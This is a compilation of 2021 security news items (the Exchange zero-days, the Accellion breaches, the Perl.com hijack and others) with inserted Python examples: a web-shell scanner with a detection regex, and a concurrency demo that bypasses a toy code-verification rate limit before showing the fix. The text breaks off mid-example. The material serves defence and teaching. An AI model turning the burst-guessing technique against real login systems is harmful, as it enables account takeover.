The US Cybersecurity and Infrastructure Security Agency (CISA) has issued the Emergency Directive 21-02 in response to the disclosure of zero-day vulnerabilities in Microsoft Exchange. The US CISA ordered federal agencies to urgently update or disconnect MS Exchange on-premises installs.
On Sunday, the EU financial regulator disclosed the attack and took offline its email systems in response to the attack as a precautionary measure.
“The European Banking Authority (EBA) has been the subject of a cyber-attack against its Microsoft Exchange Servers, which is affecting many organisations worldwide.” reads a statement published by the EBA. “As the vulnerability is related to the EBA’s email servers, access to personal data through emails held on those servers may have been obtained by the attacker.”
The financial agency has launched an investigation into the incident and notified the relevant authorities; EBA is currently working with a team of forensic experts.
According to the EBA, personal data in emails held on the compromised email systems may have been obtained by the attacker.
Microsoft updated MSERT to detect web shells used in attacks against Microsoft Exchange installs
9.3.2021 Hacking Securityaffairs
Microsoft updated its Microsoft Safety Scanner (MSERT) tool to detect web shells employed in the recent Exchange Server attacks.
Early this month, Microsoft released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.
The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to gain access to on-premises Exchange servers, read email accounts, and install backdoors to maintain access to victim environments.
“Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.” reads the advisory published by Microsoft. “Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.”
The attack chain starts with an untrusted connection to Exchange server port 443.
The first zero-day, tracked as CVE-2021-26855, is a server-side request forgery (SSRF) vulnerability in Exchange that could be exploited by an attacker to authenticate as the Exchange server by sending arbitrary HTTP requests.
The second flaw, tracked as CVE-2021-26857, is an insecure deserialization vulnerability that resides in the Unified Messaging service. The flaw could be exploited by an attacker with administrative permission to run code as SYSTEM on the Exchange server.
The third vulnerability, tracked as CVE-2021-26858, is a post-authentication arbitrary file write vulnerability in Exchange.
The last flaw, tracked as CVE-2021-27065, is a post-authentication arbitrary file write vulnerability in Exchange.
According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations. The group historically launched cyber espionage campaigns aimed at US-based organizations in multiple industries, including law firms and infectious disease researchers.
Microsoft immediately updated signatures for Microsoft Defender to detect web shells that were deployed by the attackers exploiting the above zero-day flaws.
Microsoft also updated the Microsoft Support Emergency Response Tool (MSERT) to detect the web shells employed in the attacks against the Exchange servers and remove them.
The MSERT tool is a self-contained executable file that scans a computer for malware and reports its findings; it is also able to remove detected malware.
For customers that are not able to quickly apply security updates released by Microsoft to fix the zero-day vulnerabilities, the IT giant provided alternative mitigation techniques.
“Interim mitigations if unable to patch Exchange Server 2013, 2016, and 2019: Implement an IIS Re-Write Rule and disable Unified Messaging (UM), Exchange Control Panel (ECP) VDir, and Offline Address Book (OAB) VDir Services.” reads the post published by Microsoft.
Administrators could use MSERT to make a full scan of the install or they can perform a ‘Customized scan’ of the following paths where malicious files from the threat actor have been observed:
%IIS installation path%\aspnet_client\*
%IIS installation path%\aspnet_client\system_web\*
%Exchange Server installation path%\FrontEnd\HttpProxy\owa\auth\*
Configured temporary ASP.NET files path
%Exchange Server Installation%\FrontEnd\HttpProxy\ecp\auth\*
“These remediation steps are effective against known attack patterns but are not guaranteed as complete mitigation for all possible exploitation of these vulnerabilities. Microsoft Defender will continue to monitor and provide the latest security updates.” concludes Microsoft.
As reported by Bleeping Computer, administrators that would like to scan for web shells associated with these attacks without removing them can use a new PowerShell script released by CERT Latvia.
More information on how to use this script can be found in the CERT-LV project’s GitHub repository.
Microsoft also released a PowerShell script called Test-ProxyLogon.ps1 that can be used to search for indicators of compromise (IOC) related to these attacks in Exchange and OWA log files.
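As an added example, not code from Microsoft, CERT-LV or the original article: a Python hunt over the MSERT scan directories listed above that reports server-side script files which are out of place, absent from an operator-supplied allowlist, or contain a request-to-eval pattern. The directory roots, the allowlist contents and the sample files are assumptions constructed for the demo.

```python
import os
import re
import tempfile
from dataclasses import dataclass


def exchange_scan_paths(iis_root, exchange_root, aspnet_temp):
    """The directories Microsoft listed for an MSERT "Customized scan",
    rebuilt from three roots the operator knows for their own server."""
    return [
        os.path.join(iis_root, "aspnet_client"),
        os.path.join(iis_root, "aspnet_client", "system_web"),
        os.path.join(exchange_root, "FrontEnd", "HttpProxy", "owa", "auth"),
        aspnet_temp,
        os.path.join(exchange_root, "FrontEnd", "HttpProxy", "ecp", "auth"),
    ]


# Server-side script types; a web shell in these directories is one of these.
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp"}

# Coarse content heuristic: an evaluator, process launch or response write
# fed from request data on the same line. Tune it against a clean install.
SHELL_PATTERN = re.compile(
    r"(eval|Process\.Start|Response\.Write)\s*\(.*Request", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    path: str
    reasons: tuple


def _read_head(path, limit):
    """Read at most `limit` bytes as text; undecodable bytes are tolerated."""
    try:
        with open(path, "rb") as fh:
            return fh.read(limit).decode("utf-8", errors="replace")
    except OSError:
        return ""


def scan_for_web_shells(paths, known_good=frozenset(), max_read=1_000_000):
    """Walk the scan paths and return a Finding for every script file that is
    out of place, not on the allowlist, or matches SHELL_PATTERN.
    `known_good` holds base-relative paths (forward slashes, lower-case) of
    scripts that legitimately ship with Exchange; it is an operator-supplied
    assumption, not a list taken from Microsoft."""
    findings, seen = [], set()
    for base in paths:
        if not os.path.isdir(base):
            continue  # absent on this host; not an error
        client_dir = "aspnet_client" in base.lower()
        for dirpath, _dirs, files in os.walk(base):
            for name in files:
                full = os.path.normpath(os.path.join(dirpath, name))
                ext = os.path.splitext(name)[1].lower()
                if full in seen or ext not in SCRIPT_EXTENSIONS:
                    continue
                seen.add(full)  # the two aspnet_client paths overlap
                rel = os.path.relpath(full, base).replace(os.sep, "/").lower()
                reasons = []
                if client_dir:
                    reasons.append("server-side script under aspnet_client")
                elif rel not in known_good:
                    reasons.append("script file not on the operator allowlist")
                if SHELL_PATTERN.search(_read_head(full, max_read)):
                    reasons.append("request data fed into eval/exec/write")
                if reasons:
                    findings.append(Finding(full, tuple(reasons)))
    return findings


def build_constructed_sample(root):
    """Create a constructed directory tree (demo data, not a real install)
    under `root` and return the matching scan path list."""
    iis = os.path.join(root, "inetpub", "wwwroot")
    exch = os.path.join(root, "Exchange")
    owa_auth = os.path.join(exch, "FrontEnd", "HttpProxy", "owa", "auth")
    files = {
        # script where only client assets belong; also echoes request data
        os.path.join(iis, "aspnet_client", "system_web", "help.aspx"):
            '<%@ Page Language="C#" %><% Response.Write(Request["q"]); %>',
        # allowlisted page with benign content: must not be reported
        os.path.join(owa_auth, "logon.aspx"):
            '<%@ Page Language="C#" %><html>sign in</html>',
        # unknown script with benign content: still worth a look
        os.path.join(owa_auth, "errorFF.aspx"):
            '<%@ Page Language="C#" %><html>error</html>',
        # static asset: never reported
        os.path.join(exch, "FrontEnd", "HttpProxy", "ecp", "auth", "style.css"):
            "body{}",
    }
    for path, body in files.items():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return exchange_scan_paths(iis, exch, os.path.join(root, "TempASPNET"))


def run_constructed_demo():
    """Scan the constructed tree in a temp dir; return (relative path, reasons)."""
    with tempfile.TemporaryDirectory() as root:
        found = scan_for_web_shells(build_constructed_sample(root),
                                    known_good=frozenset({"logon.aspx"}))
        return [(os.path.relpath(f.path, root).replace(os.sep, "/"), f.reasons)
                for f in found]


if __name__ == "__main__":
    for rel, reasons in run_constructed_demo():
        print(rel, "->", "; ".join(reasons))
```

Against the constructed tree the scan reports help.aspx with two reasons and errorFF.aspx with one, while the allowlisted logon.aspx and the stylesheet stay silent.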
Microsoft Server Hack Has Victims Hustling to Stop Intruders
9.3.2021 Hacking Securityweek
Victims of a massive global hack of Microsoft email server software — estimated in the tens of thousands by cybersecurity responders — hustled Monday to shore up infected systems and try to diminish chances that intruders might steal data or hobble their networks.
The White House has called the hack an “active threat” and said senior national security officials were addressing it.
The breach was discovered in early January and attributed to Chinese cyber spies targeting U.S. policy think tanks. Then in late February, five days before Microsoft issued a patch on March 2, there was an explosion of infiltrations by other intruders, piggybacking on the initial breach. Victims run the spectrum of organizations that run email servers, from mom-and-pop retailers to law firms, municipal governments, healthcare providers and manufacturers.
While the hack doesn’t pose the kind of national security threat as the more sophisticated SolarWinds campaign, which the Biden administration blames on Russian intelligence officers, it can be an existential threat for victims who didn’t install the patch in time and now have hackers lingering in their systems. The hack poses a new challenge for the White House, which even as it prepares to respond to the SolarWinds breach, must now grapple with a formidable and very different threat from China.
“I would say it’s a serious economic security threat because so many small companies out there can literally have their business destroyed through a targeted ransomware attack,” said Dmitri Alperovitch, former chief technical officer of the cybersecurity firm CrowdStrike.
He blames China for the global wave of infections that began Feb. 26, though other researchers say it’s too early to confidently attribute them. It’s a mystery how those hackers got wind of the initial breach because no one knew about this except a few researchers, Alperovitch said.
After the patch was released, a third wave of infections began, a piling on that typically occurs in such cases because Microsoft dominates the software market and offers a single point of attack.
Cybersecurity analysts trying to pull together a complete picture of the hack said their analyses concur with the figure of 30,000 U.S. victims published Friday by cybersecurity blogger Brian Krebs. Alperovitch said about 250,000 global victims have been estimated.
Microsoft has declined to say how many customers it believes are infected.
David Kennedy, CEO of cybersecurity firm TrustedSec, said hundreds of thousands of organizations could have been vulnerable to the hack.
“Anybody that had Exchange installed was potentially vulnerable,” he said. “It’s not every single one but it’s a large percentage of them.”
Katie Nickels, director of intelligence at the cybersecurity firm Red Canary, warned that installing patches won’t be enough to protect those already infected. “If you patch today that is going to protect you going forward but if the adversaries are already in your system then you need to take care of that,” she said.
A smaller number of organizations were targeted in the initial intrusion by hackers who grabbed data, stole credentials or explored inside networks and left backdoors at universities, defense contractors, law firms and infectious-disease research centers, researchers said. Among those Kennedy has been working with are manufacturers worried about intellectual property theft, hospitals, financial institutions and managed service providers who host multiple company networks.
“On the scale of one to 10, this is a 20,” Kennedy said. “It was essentially a skeleton key to open up any company that had this Microsoft product installed.”
Asked for comment, the Chinese embassy in Washington pointed to remarks last week from Foreign Ministry spokesperson Wang Wenbin saying that China “firmly opposes and combats cyber attacks and cyber theft in all forms” and cautioning that attribution of cyberattacks should be based on evidence and not “groundless accusations.”
The hack did not affect the cloud-based Microsoft 365 email and collaboration systems favored by Fortune 500 companies and other organizations that can afford quality security. That highlights what some in the industry lament as two computing classes — the security “haves” and “have-nots.”
Ben Read, director of analysis at Mandiant, said the cybersecurity firm has not seen anyone leverage the hack for financial gain, “but for folks out there who are affected time is of the essence in terms of patching this issue.”
That is easier said than done for many victims. Many have skeleton IT staff and can’t afford an emergency cybersecurity response — not to mention the complications of the pandemic.
Fixing the problem isn’t as simple as clicking an update button on a computer screen. It requires upgrading an organization’s entire so-called “Active Directory,” which catalogues email users and their respective privileges.
“Taking down your e-mail server is not something you do lightly,” said Alperovitch, who chairs the nonprofit Silverado Policy Accelerator think tank.
Tony Cole of Attivo Networks said the huge number of potential victims creates a perfect “smokescreen” for nation-state hackers to hide a much smaller list of intended targets by tying up already overstretched cybersecurity officials. “There’s not enough incident response teams to handle all of this.”
Many experts were surprised and perplexed at how groups rushed to infect server installations just ahead of Microsoft’s patch release. Kennedy, of TrustedSec, said it took Microsoft too long to get a patch out, though he does not think it should have notified people about it before the patch was ready.
Steven Adair of the cybersecurity firm Volexity, which alerted Microsoft to the initial intrusion, described a “mass, indiscriminate exploitation” that began the weekend before the patch was released and included groups from “many different countries, (including) criminal actors.”
The Cybersecurity Infrastructure and Security Agency issued an urgent alert on the hack last Wednesday and National Security Adviser Jake Sullivan tweeted about it Thursday evening.
But the White House has yet to announce any specific initiative for responding.
The launch of Williams’ new FW43B car ruined by hackers
8.3.2021 Hacking Securityaffairs
The presentation of Williams’s new Formula One car was ruined by hackers that forced the team to abandon the launch through an augmented reality app.
The Williams team presented its new Formula One car on Friday, but hackers partially ruined the launch by hacking an “augmented reality” app that was designed to show the new vehicle.
The British team, now owned by the American investment firm Dorilton Capital, was presenting the new FW43B car, which has “a dramatic new visual identity sporting a livery inspired by Williams’ all-conquering cars of the 1980s and 1990s, combining blue, white and yellow accents.”
The Formula 1 team planned to use an augmented reality app to present the car and give the fans an immersive experience, but “the app was hacked prior to launch.”
The idea to use an augmented reality app was also a consequence of the ongoing pandemic and the need to involve the fans that were not able to physically participate in the event.
The app was designed to allow fans to manipulate the car in its new livery in 3D.
The hackers were able to compromise the app, steal the information and leak images of the FW43B online before the scheduled launch.
Source: Sky Sport
This year, Williams has chosen the drivers George Russell and Nicholas Latifi for its team.
“Williams Racing is a sporting icon, and a team that has forged a reputation of success through sheer determination and grit intertwined with innovation, passionate and skillful race-craft and an absolute desire to win,” said chief executive Jost Capito.
“We were very much looking forward to sharing this experience with our fans, particularly during this difficult time when being able to bring in-person experiences directly to our fans is sadly not possible.” reads a Williams statement.
The Williams team apologized for the security breach and abandoned plans to launch the car via the augmented reality app.
Casting a Wide Intrusion Net: Dozens Burned With Single Hack
8.3.2021 Hacking Securityweek
The SolarWinds hacking campaign blamed on Russian spies and the “grave threat” it poses to U.S. national security are widely known. A very different — and no less alarming — coordinated series of intrusions also detected in December has gotten considerably less public attention.
Nimble, highly skilled criminal hackers believed to operate out of Eastern Europe hacked dozens of companies and government agencies on at least four continents by breaking into a single product they all used.
The victims include New Zealand’s central bank, Harvard Business School, Australia’s securities regulator, the high-powered U.S. law firm Jones Day — whose clients include former President Donald Trump — the rail freight company CSX and the Kroger supermarket and pharmacy chain. Also hit was Washington state’s auditor’s office, where the personal data of up to 1.3 million people gathered for an investigation into unemployment fraud was potentially exposed.
The two-stage mega-hack in December and January of a popular file-transfer program from the Silicon Valley company Accellion highlights a threat that security experts fear may be getting out of hand: intrusions by top-flight criminal and state-backed hackers into software supply chains and third-party services.
Operating system companies such as Microsoft have long been bull’s-eyes — with untold thousands of installations of its Exchange email server being violated globally in the past few weeks, mostly after the company issued a patch and disclosed that Chinese state hackers had penetrated the program.
The Accellion casualties have kept piling up, meanwhile, with many being extorted by the Russian-speaking Clop cybercriminal gang, which threat researchers believe may have bought pilfered data from the hackers. Their threat: Pay up or we leak your sensitive data online, be it proprietary documents from Canadian aircraft maker Bombardier or lawyer-client communications from Jones Day.
The hack of up to 100 Accellion customers, who were easily identified by the hackers with an online scan, puts in painful relief a digital age core mission at which both governments and the private sector have been falling short.
“Attackers are finding it harder and harder to gain access via traditional methods, as vendors like Microsoft and Apple have hardened the security of the operating systems considerably over the last years. So, the attackers find easier ways in. This often means going via the supply chain. And as we’ve seen, it works,” said Mikko Hypponen, chief research officer of the cybersecurity firm F-Secure.
Members of Congress are already dismayed by the supply-chain hack of the Texas network management software company SolarWinds that allowed suspected Russian state-backed hackers to tiptoe unnoticed — apparently intent solely on intelligence-gathering — for more than half a year through the networks of at least nine government agencies and more than 100 companies and think tanks. Only in December was the SolarWinds hacking campaign discovered, by the cybersecurity firm FireEye.
France suffered a similar hack, blamed by its cybersecurity agency on Russian military operatives, that also gamed the supply chain. They slipped malware into an update of network management software from a firm called Centreon, letting them quietly root around victim networks from 2017 to 2020.
Both those hacks snuck malware into software updates. The Accellion hack was different in one key respect: Its file-transfer program resided on victims’ networks either as a stand-alone appliance or cloud-based app. Its job is to securely move around files too large to be attached to email.
Mike Hamilton, a former Seattle chief information security officer now with CI Security, said the trend of exploiting third-party service providers shows no signs of slowing because it gives criminals the highest return on their investment if they “want to compromise a broad swath of companies or government agencies.”
The Accellion breach’s impact might have been dulled had the company alerted customers more quickly, some complain.
The governor of New Zealand’s central bank, Adrian Orr, says Accellion failed to warn it after first learning in mid-December that the nearly 20-year-old FTA application — using antiquated technology and set for retirement — had been breached.
Despite having a patch available on Dec. 20, Accellion did not notify the bank in time to prevent its appliance from being breached five days later, the bank said.
“If we were notified at the appropriate time, we could have patched the system and avoided the breach,” Orr said in a statement posted on the bank’s website. Among information stolen were files containing personal emails, dates of birth and credit information, the bank said.
Similarly, the Washington state auditor’s office has no record of being informed of the breach until Jan. 12, the same day Accellion announced it publicly, said spokeswoman Kathleen Cooper. Accellion said then that it released a patch to the fewer than 50 customers affected within 72 hours of learning of the breach.
Accellion now tells a different story. It says it alerted all 320 potentially affected customers with multiple emails beginning on Dec. 22 — and followed up with emails and phone calls. Company spokesman Rob Dougherty would not directly address the New Zealand central bank’s and Washington state auditor’s complaints. Accellion says fewer than 25 customers appear to have suffered significant data theft.
A timeline released March 1 by the cybersecurity firm Mandiant, which Accellion hired to examine the incident, says the company got first word of the breach on Dec. 16. The Washington state auditor says its hack occurred on Christmas.
The notification timing issue is serious. Washington state has already been hit by a lawsuit, and several have been filed against Accellion seeking class action. Other organizations could also face legal or other consequences.
Last month, Harvard Business School officials emailed affected students to tell them that some Social Security numbers had been compromised as well as other personal information. Another victim, the Singapore-based telecommunications company Singtel, said personal data on about 129,000 customers was compromised.
Too often, software companies with hundreds of programmers have just one or two security people, said Katie Moussouris, CEO of Luta Security.
“We wish we could say that organizations were uniformly investing in security. But we’re actually seeing them just dealing with the breaches and then vowing to do better in the future. And that’s been sort of the business model.”
Dougherty, the Accellion spokesman, said the attacks “had nothing to do with staffing,” but he would not say how many people directly assigned to security the company employed in mid-December.
Cybersecurity threat analysts hope the snowballing of supply-chain hacks stuns the software industry into prioritizing security. Otherwise, vendors risk the fate that has befallen SolarWinds.
In a filing this past week with the Securities and Exchange Commission, the company offered a bleak outlook.
It said that as supply-chain hacks “continue to evolve at a rapid pace” it “may be unable to identify current attacks, anticipate future attacks or implement adequate security measures.”
The ultimate, painful upshot, the document added:
“Customers have and may in the future defer purchasing or choose to cancel or not renew their agreements or subscriptions with us.”
F1 Team Williams Unveils New Car After Hackers Foil Launch
8.3.2021 Hacking Securityweek
The Williams team presented its new Formula One car on Friday — after hackers foiled plans for an “augmented reality” launch — revealing a livery inspired by its “all-conquering cars of the 1980s and 1990s.”
The British team enters its first full season under the ownership of US-based investment firm Dorilton Capital.
The FW43B car has “a dramatic new visual identity sporting a livery inspired by Williams’ all-conquering cars of the 1980s and 1990s, combining blue, white and yellow accents.”
Williams had planned to reveal the car via an augmented reality app but scrapped it “because the app was hacked prior to launch.”
The team wanted to let fans experience an innovative launch “during this difficult time when being able to bring in-person experiences directly to our fans is sadly not possible. We can only apologize that this has not been possible.”
Williams hopes to revive its fortunes when drivers George Russell and Nicholas Latifi take to the grid for the season-opening GP in Bahrain on March 28.
The team finished rock bottom in the constructors’ standings in the past two seasons, scoring only one point from Robert Kubica’s 10th-place finish in 2019.
“Williams Racing is a sporting icon, and a team that has forged a reputation of success through sheer determination and grit intertwined with innovation, passionate and skillful race-craft and an absolute desire to win,” chief executive Jost Capito said in a statement.
The livery, Capito said, “acknowledges our incredible past and retains the spirit, drive and motivation that remains at the core of Williams’ DNA yet looks to the future and signposts our long-term ambition to return to the front of the grid.”
Russell said the new look has a “hint of heritage.”
“Altogether, I think it’s exciting and I think that’s the team at the moment — new ownership, new look, new brand and it’s the start of a new beginning,” the 23-year-old British driver said in a video posted on the team’s Twitter account.
Qualys Confirms Unauthorized Access to Data via Accellion Hack
6.3.2021 Hacking Securityweek
Hours after the Clop ransomware gang published data allegedly stolen from information security and compliance solutions provider Qualys, the company has confirmed being impacted by the recent cyberattack involving Accellion’s FTA product.
Founded in 1999, the California-based firm serves more than 10,000 customers in over 130 countries around the world, including many of the Forbes Global 100 companies.
Data allegedly stolen from the company, including scan results and financial documents, was published on the “CL0P^_- LEAKS” Tor website this week. Maintained by the operators of the Clop ransomware, the portal is used to publish data stolen from victims unwilling to give in to their ransom demands.
Initially, the website would list data exfiltrated during ransomware attacks, but as of late it has been flooded with data stolen from various organizations that were relying on the Accellion FTA file transfer software.
The data was compromised during a December 2020 cyber-attack that Accellion confirmed earlier this year. A total of four zero-day vulnerabilities were identified in the attack, all of which have already been patched.
In a report published a couple of weeks ago, FireEye’s Mandiant researchers linked the attack to the FIN11 cybercrime group, a TA505 spin-off.
“The exploited vulnerabilities were of critical severity because they were subject to exploitation via unauthenticated remote code execution,” Accellion noted in a report detailing Mandiant’s investigation into the incident.
The company also said the attackers likely reverse engineered the file transfer software, which provided them with “a high level of sophistication and deep familiarity with the inner workings of the Accellion FTA software.”
Following the publishing of its data on Clop’s leaks website, Qualys confirmed impact from the Accellion FTA incident, saying that it resulted in “unauthorized access to files hosted on the Accellion FTA server.”
The company also notes that the unauthorized access was limited to the FTA server and that the incident had no “impact on the Qualys production environments, codebase or customer data hosted on the Qualys Cloud Platform.”
The Accellion FTA server, the company explains, was deployed in a segregated DMZ environment, separated from the production customer data environment. Furthermore, Qualys says it applied the released hotfix immediately after receiving it and completely isolated the FTA server after receiving an integrity alert a few days later.
“We immediately notified the limited number of customers impacted by this unauthorized access,” Qualys says, without providing additional information on the compromised data or the number of affected customers.
Mazafaka — Elite Hacking and Cybercrime Forum — Got Hacked!
6.3.2021 Hacking Thehackernews
In what's a case of hackers getting hacked, a prominent underground online criminal forum by the name of Maza has been compromised by unknown attackers, making it the fourth forum to have been breached since the start of the year.
The intrusion is said to have occurred on March 3, with information about the forum members — including usernames, email addresses, and hashed passwords — publicly disclosed on a breach notification page put up by the attackers, stating "Your data has been leaked" and "This forum has been hacked."
"The announcement was accompanied by a PDF file allegedly containing a portion of forum user data. The file comprised more than 3,000 rows, containing usernames, partially obfuscated password hashes, email addresses and other contact details," cybersecurity firm Intel 471 said.
Originally called Mazafaka, Maza is an elite, invite-only Russian-language cybercrime forum known to be operational as early as 2003, acting as an exclusive online space for exploit actors to trade ransomware-as-a-service tools and conduct other forms of illicit cyber operations.
The development comes close on the heels of successful breaches of other forums, including that of Verified, Crdclub, and Exploit.
Verified is said to have been breached on January 20, 2021, with the actor behind the attack claiming access to the entire database on another popular forum called Raid Forums, besides transferring $150,000 worth of cryptocurrency from Verified's bitcoin wallet to their own. The forum, however, staged a return last month on February 18 with a change in ownership, according to Flashpoint.
Then again, in February, a cybercrime forum known as Crdclub disclosed an attack that resulted in the compromise of an administrator account with the goal of defrauding its members. No other personal information appears to have been plundered.
"By doing so, the actor behind the attack was able to lure forum customers to use a money transfer service that was allegedly vouched for by the forum's admins," Intel 471 said. "That was a lie, and resulted in an unknown amount of money being diverted from the forum."
Lastly, earlier this week, the Exploit cybercrime forum sustained an attack that involved an apparent compromise of a proxy server used for safeguarding the forum from distributed denial-of-service (DDoS) attacks.
Details are fuzzy as to the perpetrators of the attacks, with forum members speculating that it could be the work of a government intelligence agency, while also distressing over the possibility that their real-world identities could be exposed in the wake of the leaks.
Flashpoint researchers noted that the Russian sentences on the Maza forum's notification page were possibly translated using an online translator, but added it's unclear if this implies the involvement of a non-Russian speaking actor or if it was deliberately used to mislead attribution.
"While Intel 471 isn't aware of anyone claiming responsibility for the breaches, whoever is behind the actions has indirectly given researchers an advantage," the company concluded. "Any information unearthed from the breaches aids in the fight against these criminals due to the added visibility it gives security teams who are tracking actors that populate these forums."
Bug bounty hunter awarded $50,000 for a Microsoft account hijack flaw
4.3.2021 Hacking Securityaffairs
A researcher received a $50,000 bug bounty from Microsoft for reporting a vulnerability that could have allowed anyone to hijack any account.
Microsoft has awarded the security researcher Laxman Muthiyah $50,000 for reporting a vulnerability that could have allowed anyone to hijack users’ accounts without consent.
According to the expert, the vulnerability only impacts consumer accounts.
The vulnerability made it possible to brute-force the seven-digit security code that is sent via email or SMS as a verification step in the password reset procedure.
“To reset a Microsoft account’s password, we need to enter our email address or phone number in their forgot password page, after that we will be asked to select the email or mobile number that can be used to receive security code.” the expert wrote. “Once we receive the 7 digit security code, we will have to enter it to reset the password. Here, if we can bruteforce all the combination of 7 digit code (that will be 10^7 = 10 million codes), we will be able to reset any user’s password without permission.”
The researcher pointed out that rate limits are implemented to limit the number of attempts and protect the accounts.
Analysis of the HTTP POST request sent to validate the code revealed that the code is encrypted before being sent, so automating a brute-force attack first required working around that encryption.
“If you look at the screenshot above, the code 1234567 we entered was nowhere present in the request. It was encrypted and then sent for validation.” continues the post. “I guess they are doing this to prevent automated bruteforce tools from exploiting their system. So, we cannot automate testing multiple codes using tools like Burp Intruder since they won’t do the encryption part.”
To determine the rate limit protecting the accounts, the expert sent 1,000 code attempts; only 122 were processed, the rest returned an error (error code 1211) and every further request was blocked.
By sending the requests simultaneously, the expert bypassed both the blocking mechanism and the encryption. He noticed that the mechanism blacklists the IP address only if the requests do not all arrive at the server at the same time.
The attack is not simple in a real scenario, however: to change the password of an arbitrary Microsoft account (including accounts with 2FA enabled), an attacker has to send all possible security codes, approximately 11 million requests, concurrently.
Such an attack would require substantial computing resources as well as thousands of IP addresses to complete successfully.
Muthiyah reported the flaw to Microsoft, which quickly acknowledged the issue and addressed it in November 2020.
The bug bounty award of $50,000 was issued on February 9 via the HackerOne bug bounty platform, a partner for distributing rewards. Microsoft offers between $1,500 and $100,000 for valid bug reports.
“I received the bounty of $50,000 USD on Feb 9th, 2021 through hackerone and got approval to publish this article on March 1st. I would like to thank Dan, Jarek and the entire MSRC Team for patiently listening to all my comments, providing updates and patching the issue. I also like to thank Microsoft for the bounty.” concluded the expert.
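The race described above, as an added example that is neither the researcher's code nor Microsoft's implementation: a verification-code check whose rate limit is applied as check-then-record processes every guess in a burst that arrives at once, while a limiter that counts the attempt under a lock before comparing the code rejects everything past the budget no matter how the requests are timed. The attempt budget, the secret code, the server-side delay and the burst size are assumptions constructed for the demo.

```python
"""Added example: a racy verification-code limiter beside an atomic one.
The limiter design, attempt budget and code are assumptions for the demo,
not Microsoft's implementation."""
import threading
import time

MAX_ATTEMPTS = 5           # assumed per-account budget of code guesses
CORRECT_CODE = "4829173"   # constructed 7-digit code for the demo
WORK_DELAY = 0.05          # models server-side work between check and record


class RacyVerifier:
    """Check-then-record: reads the counter, compares the code, and only then
    records the attempt. Guesses that arrive together all read a counter
    below the limit, so a burst is fully processed."""

    def __init__(self):
        self.attempts = 0

    def verify(self, code):
        if self.attempts >= MAX_ATTEMPTS:
            return "blocked"
        matched = code == CORRECT_CODE
        time.sleep(WORK_DELAY)        # window in which the other guesses pass the check
        self.attempts += 1
        return "ok" if matched else "wrong"


class AtomicVerifier:
    """Record-then-check under a lock: the attempt is counted before the code
    is compared, so at most MAX_ATTEMPTS guesses are ever compared, however
    many arrive at once."""

    def __init__(self):
        self.attempts = 0
        self.lock = threading.Lock()

    def verify(self, code):
        with self.lock:
            self.attempts += 1
            if self.attempts > MAX_ATTEMPTS:
                return "blocked"
        matched = code == CORRECT_CODE
        time.sleep(WORK_DELAY)
        return "ok" if matched else "wrong"


def burst(verifier, codes):
    """Send every code at the same moment (threads released by a barrier) and
    return a tally of the verifier's answers."""
    results = []
    barrier = threading.Barrier(len(codes))

    def worker(code):
        barrier.wait()
        results.append(verifier.verify(code))   # list.append is atomic in CPython

    threads = [threading.Thread(target=worker, args=(c,)) for c in codes]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return {answer: results.count(answer) for answer in set(results)}


def guesses(n):
    """n constructed 7-digit guesses, one of which is the correct code."""
    codes = ["%07d" % i for i in range(n)]
    codes[n // 2] = CORRECT_CODE
    return codes


if __name__ == "__main__":
    batch = guesses(40)
    print("racy  :", burst(RacyVerifier(), batch))    # every guess compared, correct code found
    print("atomic:", burst(AtomicVerifier(), batch))  # 5 compared, 35 rejected unseen
```

The fix is not the lock by itself but the ordering: the attempt has to be charged to the account before the code is compared, and the charge and the comparison must not be separable by a second request. A per-IP blacklist applied after the fact, which is what the researcher's observation suggests, does nothing against a burst that is already in flight.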
Hackers Control Perl.com Domain Months Before Hijack
3.3.2021 Hacking Securityweek
The Perl.com domain was hijacked in January 2021, but hackers seemingly took control of it four months prior, in September 2020.
Serving articles about the Perl programming language since 1997 and managed by The Perl Foundation, the domain started pointing to a parked site at the end of January, with evidence suggesting connections to sites distributing malware.
The issue, some of those involved with maintaining the site said at the time, was related to an account hijack that resulted in an unknown party being able to grab the domain for ten years.
In a post on Sunday, Brian Foy, senior editor of Perl.com and author of several books on Perl, explains that the account hijack appears to have been, in fact, an attack on the domain name registrar Network Solutions.
The attack, he explains, took place in September 2020 and might have resulted in several other domains being compromised.
“We think that there was a social engineering attack on Network Solutions, including phony documents and so on. There’s no reason for Network Solutions to reveal anything to me, but I did talk to other domain owners involved and this is the basic scheme they reported,” he notes.
In December, the hackers transferred the domain to the BizCN registrar. Although the domain was compromised in September, ICANN prohibits the transfer of a domain for 60 days following the updating of contact info.
The attackers also renewed the domain for two more years and, in January 2021, transferred it once again, this time to Key Systems, GmbH.
“This latency period avoids immediate detection, and bouncing the domain through a couple registrars makes the recovery much harder,” Foy says.
After the transfer to Key Systems, the fraudulent registrant also listed Perl.com on the domain marketplace Afternic for $190,000.
The domain was back in the hands of Tom Christiansen, the rightful owner, in early February. However, with security products quick to blacklist it and some DNS servers sinkholing it, it took a while longer for everything to be restored to normal.
“I think we’re fully back,” Foy notes, adding that the team is working on ensuring that such hijacking doesn’t happen again.
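The sequence Foy describes (a contact change, a wait for the ICANN transfer lock to lapse, a registrar move with a renewal nobody ordered, then a second registrar move) is exactly what a registration monitor should catch. The following is an added example, not code from The Perl Foundation or from the article: it diffs dated registration-record snapshots and annotates a registrar change with the time elapsed since the last contact change. The snapshots, field names and dates are constructed for the demo (the shape loosely follows RDAP status data) and are not real Perl.com records.

```python
"""Added example: detect the registration changes that precede a domain
hijack by diffing dated registration-record snapshots. Snapshots, field
names and dates are constructed for the demo (the shape loosely follows
RDAP status data); they are not real Perl.com records."""
from datetime import date

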